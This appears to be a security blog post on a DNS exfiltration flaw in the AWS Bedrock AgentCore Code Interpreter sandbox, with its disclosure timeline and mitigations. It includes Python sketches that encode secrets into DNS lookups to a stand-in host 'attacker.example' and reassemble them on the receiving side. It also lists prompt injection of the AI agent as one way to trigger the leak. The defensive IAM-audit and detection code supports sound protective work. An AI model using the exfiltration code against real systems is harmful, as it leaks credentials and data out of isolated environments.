
Researchers Uncover Data Leak Vulnerability in AWS Bedrock AI Code Interpreter

  • Mar 17
  • 2 min read

Key Findings

* Researchers discovered a vulnerability in the AWS Bedrock AgentCore Code Interpreter
* DNS queries can be exploited to leak sensitive data from supposedly isolated AI systems
* The vulnerability received a high-severity score of 7.5 out of 10
* AWS responded by updating documentation instead of issuing a full patch
* Potential risks include data breaches and infrastructure compromise

Background

AWS Bedrock is a platform for building AI applications; its AgentCore Code Interpreter lets chatbots write and execute code for tasks such as data analysis. The system offers a Sandbox mode designed to isolate AI operations from external networks, creating a supposedly secure environment for code execution.


Technical Vulnerability

The core issue lies in the Sandbox mode's DNS query handling. While most network traffic is blocked, the system still allows DNS A and AAAA record queries. Researchers demonstrated that an attacker could hide commands and exfiltrate data by manipulating these DNS requests, effectively creating a covert communication channel.
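The technique works because even a sandbox that blocks outbound connections still resolves hostnames, and every lookup for a subdomain of an attacker-controlled domain reaches that attacker's authoritative nameserver. A minimal sketch of the encoding side, assuming a placeholder domain `attacker.example` and a hex-chunk layout (illustrative, not the researchers' actual tooling):

```python
# Minimal sketch of DNS-based exfiltration as described in the article.
# "attacker.example" and the <seq>.<hexchunk>.<domain> layout are
# illustrative assumptions, not the researchers' actual implementation.
import binascii

MAX_LABEL = 63  # DNS limits each label to 63 bytes (RFC 1035)

def encode_exfil_queries(secret: bytes, domain: str = "attacker.example") -> list[str]:
    """Split a secret into hex chunks and embed each chunk as a DNS label.

    Resolving each resulting hostname would emit an A/AAAA query that
    reaches the attacker's authoritative nameserver even from a sandbox
    that blocks all other outbound traffic.
    """
    hex_data = binascii.hexlify(secret).decode()
    chunks = [hex_data[i:i + MAX_LABEL] for i in range(0, len(hex_data), MAX_LABEL)]
    # A sequence number lets the receiver reassemble chunks in order.
    return [f"{seq}.{chunk}.{domain}" for seq, chunk in enumerate(chunks)]

queries = encode_exfil_queries(b"AKIA-EXAMPLE-KEY")
```

From inside the sandbox, the attacker's code would only need to resolve each of these names; no socket to the attacker's server is ever opened directly.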


Proof of Concept

The research team developed a system that could:

* Smuggle data out through DNS queries
* Establish two-way communication with the isolated AI environment
* Bypass AWS's promised security isolation
* Demonstrate a DNS command-and-control channel using ASCII-encoded data
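The receiving half of such a channel is equally simple: the attacker's nameserver logs every query it is asked to resolve and reassembles the payload. A sketch of that side, under the same illustrative `<seq>.<hexchunk>.attacker.example` layout assumed above:

```python
# Receiver-side sketch: reassemble ASCII-hex chunks observed by an
# attacker-controlled authoritative DNS server. The hostname layout
# (<seq>.<hexchunk>.attacker.example) is an illustrative assumption.
import binascii

def reassemble(query_log: list[str], domain: str = "attacker.example") -> bytes:
    """Sort captured query names by sequence number and decode the payload."""
    chunks = []
    suffix = "." + domain
    for name in query_log:
        if not name.endswith(suffix):
            continue  # unrelated traffic
        seq, hex_chunk = name[:-len(suffix)].split(".", 1)
        chunks.append((int(seq), hex_chunk))
    chunks.sort()  # DNS queries may arrive out of order
    return binascii.unhexlify("".join(chunk for _, chunk in chunks))

# Two captured queries, deliberately out of order:
log = ["1.6f726c64.attacker.example", "0.68656c6c6f2077.attacker.example"]
```

Replies can travel the other way in the DNS answers themselves (for example, encoded in the returned A records), which is what makes the channel two-way.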


Disclosure Timeline

* September 2025: Initial vulnerability reported to AWS
* November 2025: AWS attempts a fix
* Two weeks later: Fix withdrawn due to technical issues
* Late December 2025: AWS opts for documentation update instead of patch


Potential Attack Vectors

Possible exploitation methods include:

* Prompt injection
* Supply chain attacks
* Manipulating third-party code libraries
* Accessing AWS S3 storage and Secrets Manager


Expert Recommendations

Security experts suggest:

* Switching to VPC mode
* Minimizing AI tool permissions
* Implementing deception artifacts
* Auditing IAM roles
* Carefully monitoring AI code execution environments
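Auditing IAM roles can be partially automated by scanning for the over-permissioning that lets a compromised interpreter reach S3 or Secrets Manager. A minimal sketch that flags overly broad Allow statements in a policy document (the example policy is illustrative; fetching real documents, e.g. via boto3's `iam` client, is left out):

```python
# Flag IAM policy statements that grant wildcard actions or an unrestricted
# resource. Pure policy-document logic; the example policy is illustrative.

def find_broad_statements(policy: dict) -> list[dict]:
    """Return Allow statements whose Action contains '*' or whose Resource is '*'."""
    flagged = []
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be a bare dict
        statements = [statements]
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        resources = stmt.get("Resource", [])
        actions = [actions] if isinstance(actions, str) else actions
        resources = [resources] if isinstance(resources, str) else resources
        if any("*" in a for a in actions) or any(r == "*" for r in resources):
            flagged.append(stmt)
    return flagged

example_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::logs/*"},
        {"Effect": "Allow", "Action": "secretsmanager:*", "Resource": "*"},
    ],
}
```

Statements like the second one are exactly what turns a sandbox escape into a credential leak.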


Mitigation Strategies

Organizations can protect themselves by:

* Inventorying active Code Interpreter instances
* Migrating critical data instances to VPC mode
* Implementing strict access controls
* Continuously monitoring AI system interactions
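Monitoring can include watching the sandbox's DNS traffic for exfiltration patterns: encoded payloads produce unusually long, high-entropy labels that ordinary hostnames lack. A heuristic sketch (the thresholds are illustrative assumptions, not tuned values from the research):

```python
# Heuristic detector for DNS exfiltration: encoded payloads tend to produce
# long, high-entropy labels. Thresholds here are illustrative assumptions.
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of the string."""
    counts = Counter(s)
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def looks_like_exfil(hostname: str, min_len: int = 24, min_entropy: float = 3.5) -> bool:
    """Flag hostnames containing a long, high-entropy label."""
    return any(
        len(label) >= min_len and shannon_entropy(label) >= min_entropy
        for label in hostname.split(".")
    )
```

A detector like this produces false positives (CDN hostnames, for instance), so in practice it would feed an alert queue rather than block queries outright.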


Broader Implications

The vulnerability highlights significant challenges in AI system security, demonstrating that traditional isolation techniques may be insufficient for modern AI platforms. It underscores the need for more sophisticated security approaches that can handle the complex interactions of AI systems.


Sources

* https://hackread.com/data-leak-risk-in-aws-bedrock-ai-code-interpreter/
* https://x.com/HackRead/status/2033685581813707169

© 2025 by Explain IT Again